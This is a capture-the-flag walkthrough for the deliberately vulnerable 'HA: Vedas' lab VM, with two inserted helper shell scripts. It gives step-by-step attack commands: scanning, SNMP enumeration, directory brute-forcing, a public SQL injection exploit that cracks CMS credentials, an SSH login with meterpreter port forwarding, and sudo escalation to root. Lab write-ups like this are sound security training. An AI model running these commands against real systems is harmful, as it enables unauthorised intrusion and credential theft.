HA: Vedas Vulnhub Walkthrough

Today we will be cracking the vulnerable VM called HA: Vedas. It is a capture-the-flag style challenge with four flags, one for each of the four Vedas of Hinduism, and each flag leads to the next. You can download the VM from here.

Power on Kali Linux as your attacker machine and let's get started.

Penetration Testing Methodology

- Network Scanning
  - Netdiscover
  - Nmap
- Flag 1
- Flag 2
- Flag 3
- Flag 4

The Walkthrough

Network Scanning

Let us begin by finding the IP address of the machine we need to attack, which can be done with netdiscover. When the addresses come back, match each MAC address vendor to the virtualization platform: the target is the host whose vendor shows as VMware. Here that host has the IP address 192.168.0.163. To find it, run:

netdiscover


After netdiscover, we scan the target with Nmap to discover the open ports and the services running on them. An aggressive scan (-A) shows two TCP services on the virtual machine: SSH (22) and HTTP (80).

nmap -A 192.168.0.163

A UDP scan shows that SNMP is also running, on UDP port 161, which will be useful for enumeration.

nmap -sU 192.168.0.163

# Flag 1

Since the Nmap scan found SNMP, we enumerate the machine over SNMP with the snmp_enum auxiliary module in msfconsole (it queries the default community string public): load the module, set rhosts, and run it.

use auxiliary/scanner/snmp/snmp_enum

set rhosts 192.168.0.163

exploit

In the module output you will find the first flag, named snmp.

# Flag 2

Next we look at the HTTP service running on the virtual machine in a web browser.

http://192.168.0.163


Here we use cewl to build a dictionary from the words present on the web page:

cewl http://192.168.0.163/ > dict.txt

Now that the dictionary is ready, we use it as the wordlist for a dirb scan of the web page to find hidden directories:

dirb http://192.168.0.163/ dict.txt

dirb finds a directory named Kashyapa.
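The two steps above (harvest words from the site, then feed them back as a directory and password wordlist) are what cewl does; the following POSIX sh script is an added example, not part of the original walkthrough, that reimplements the core of it so you can see exactly how a site-specific word such as Kashyapa ends up in dict.txt. The HTML page embedded in the script is constructed for this example and is not the real HA: Vedas site.

```shell
#!/bin/sh
# Added example: a minimal cewl-style wordlist builder.
# It strips HTML tags, splits the remaining text on anything that is not a
# letter, keeps words of a minimum length, and emits a de-duplicated list
# suitable for dirb or for a password-cracking run.

# make_wordlist [min-length]  (reads HTML on stdin, default minimum length 3)
make_wordlist() {
    min="${1:-3}"
    sed 's/<[^>]*>/ /g' \
      | tr -cs 'A-Za-z' '\n' \
      | awk -v m="$min" 'length($0) >= m' \
      | sort -u
}

# Constructed sample page, standing in for http://192.168.0.163/ (not the real site).
SAMPLE_HTML='<html><head><title>Vedas</title></head>
<body>
<h1>The four Vedas</h1>
<p>Rig, Yajur, Sama and Atharva. Sage Kashyapa is mentioned here.</p>
<a href="/Kashyapa/">Kashyapa</a>
</body></html>'

# wordlist_count: number of unique candidate words produced from the sample page.
wordlist_count() {
    printf '%s\n' "$SAMPLE_HTML" | make_wordlist | wc -l | tr -d ' '
}

# has_word <word>: succeeds if the word appears in the generated list (exact match).
has_word() {
    printf '%s\n' "$SAMPLE_HTML" | make_wordlist | grep -qx "$1"
}

# Usage: print the wordlist that would be written to dict.txt.
printf '%s\n' "$SAMPLE_HTML" | make_wordlist
```

Note that words inside tag attributes (the href="/Kashyapa/" above) are discarded with the tag; the directory name is only recovered because it also appears in the visible text, which is exactly why a wordlist built from page content can double as a directory list. The real cewl adds options this toy lacks, such as spidering to a given depth, a minimum word length (-m) and lowercasing (--lowercase); lowercase variants matter when the list is reused for password cracking, since the exploit's --crack option compares hashes exactly.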

Opening that directory in the browser loads a CMS page.

Searching the web for a public exploit against this CMS leads to www.exploit-db.com, where the details of the exploit are available.


The exploit used is an SQL injection for the CMS, Exploit-DB 46635; download it.

Run the exploit from the folder it was downloaded to, passing the URL of the CMS directory and, with --crack, the dictionary to use for cracking the recovered password hash:

python 46635.py -u http://192.168.0.163/Kashyapa/ --crack -w /root/dict.txt

The exploit recovers the username and password for the web application: atri:anasuya.

Now append /admin/login.php to the site URL to open the CMS login page, and enter the username and password found above.

After logging in, you will see the second flag in the content of the CMS; it is named after the second Veda, Yajur Veda.

Now let us move on to finding the third flag.

# Flag 3

Network scanning showed that the SSH port is open. We open msfconsole and use the ssh_login auxiliary module to test the credentials recovered from the CMS against SSH:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.0.163

set username atri

set password anasuya

exploit

The login succeeds and a shell session is created. Upgrade session 1 to a meterpreter session:

sessions -u 1

The upgrade creates the meterpreter session as session 2; interact with it:

sessions 2

From the meterpreter session, run netstat to list the listening and established connections. You will notice a service listening on 127.0.0.1 port 5000, which is bound to loopback and therefore reachable only from the target itself.

We therefore use meterpreter's port forwarding to relay local TCP port 5000 to port 5000 on the target's loopback interface:

portfwd add -l 5000 -p 5000 -r 127.0.0.1
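Picking out loopback-only listeners from netstat output is the general form of what was just done by eye for port 5000. The POSIX sh script below is an added example, not part of the original walkthrough: it reads netstat -tlnp style text, lists every TCP port that is listening only on 127.0.0.1 or ::1, and prints for each one both the meterpreter portfwd line used above and an equivalent plain SSH -L tunnel, which works here because atri's SSH password is known. The netstat text embedded in the script is constructed for the example and is not the real output from the HA: Vedas machine.

```shell
#!/bin/sh
# Added example: find loopback-only services in netstat output and turn each
# into a port-forward command.

# Constructed sample of `netstat -tlnp` output (not captured from the target).
NETSTAT_SAMPLE='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -'

# loopback_listeners: read netstat text on stdin, print the TCP ports that are
# in LISTEN state and bound only to 127.0.0.1 or ::1 (one port per line).
# 0.0.0.0:22 and :::80 are reachable from outside already and are skipped.
loopback_listeners() {
    awk '$1 ~ /^tcp/ && $6 == "LISTEN" && $4 ~ /^(127\.0\.0\.1|::1):[0-9]+$/ {
             sub(/.*:/, "", $4); print $4 }'
}

# forward_commands <rhost> <ssh-user>: for every loopback-only port, print the
# meterpreter portfwd command and an equivalent `ssh -L` local forward.
forward_commands() {
    rhost="$1"; user="$2"
    loopback_listeners | while read -r port; do
        printf 'portfwd add -l %s -p %s -r 127.0.0.1\n' "$port" "$port"
        printf 'ssh -L %s:127.0.0.1:%s %s@%s\n' "$port" "$port" "$user" "$rhost"
    done
}

# Usage: on the target you would pipe the real `netstat -tlnp` into these.
printf '%s\n' "$NETSTAT_SAMPLE" | loopback_listeners
printf '%s\n' "$NETSTAT_SAMPLE" | forward_commands 192.168.0.163 atri
```

Either tunnel makes the hidden web service appear on your own 127.0.0.1:5000; the SSH variant needs no meterpreter session at all, which is worth remembering when you already hold valid SSH credentials. The 3306 line in the sample is there to show that the same check also surfaces a local database, another common pivot target.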

Browsing to http://127.0.0.1:5000 on the attacker machine now shows the third flag, named Sama Veda.

The flag page also contains a hash. Looking that hash up in an online hash database returns its plaintext, which the page labels as the "way 2 root" value.

# Flag 4

Now let's look for the final root flag. You have the SSH credentials for the user atri, so log in over SSH with that password, then list the home directories to see which users exist on the virtual machine:

ssh atri@192.168.0.163

cd /home

ls

There is another user named vedas. Switch to this user, check which commands it may run with sudo, and use that to get a root shell:

su vedas

sudo -l

sudo bash

Now change to the root directory, list its contents, and read the flag file:

cd /root

ls

cat final.txt

Here you go! You have found the final flag. The HA: Vedas virtual machine is rooted.